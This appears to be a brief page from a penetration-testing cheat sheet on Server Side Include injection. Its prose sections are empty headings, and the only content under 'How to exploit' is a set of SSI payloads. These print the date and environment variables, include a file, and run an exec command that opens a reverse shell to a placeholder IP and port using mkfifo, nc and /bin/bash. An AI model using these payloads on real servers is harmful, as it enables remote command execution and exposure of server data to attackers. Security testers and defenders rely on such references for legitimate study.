Server Side Include Injection (SSI Injection)
Introduction
Where to find
How to exploit
<!--#echo var="DATE_LOCAL" --><!--#printenv --><!--#include file="includefile.html" --><!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->References
Last updated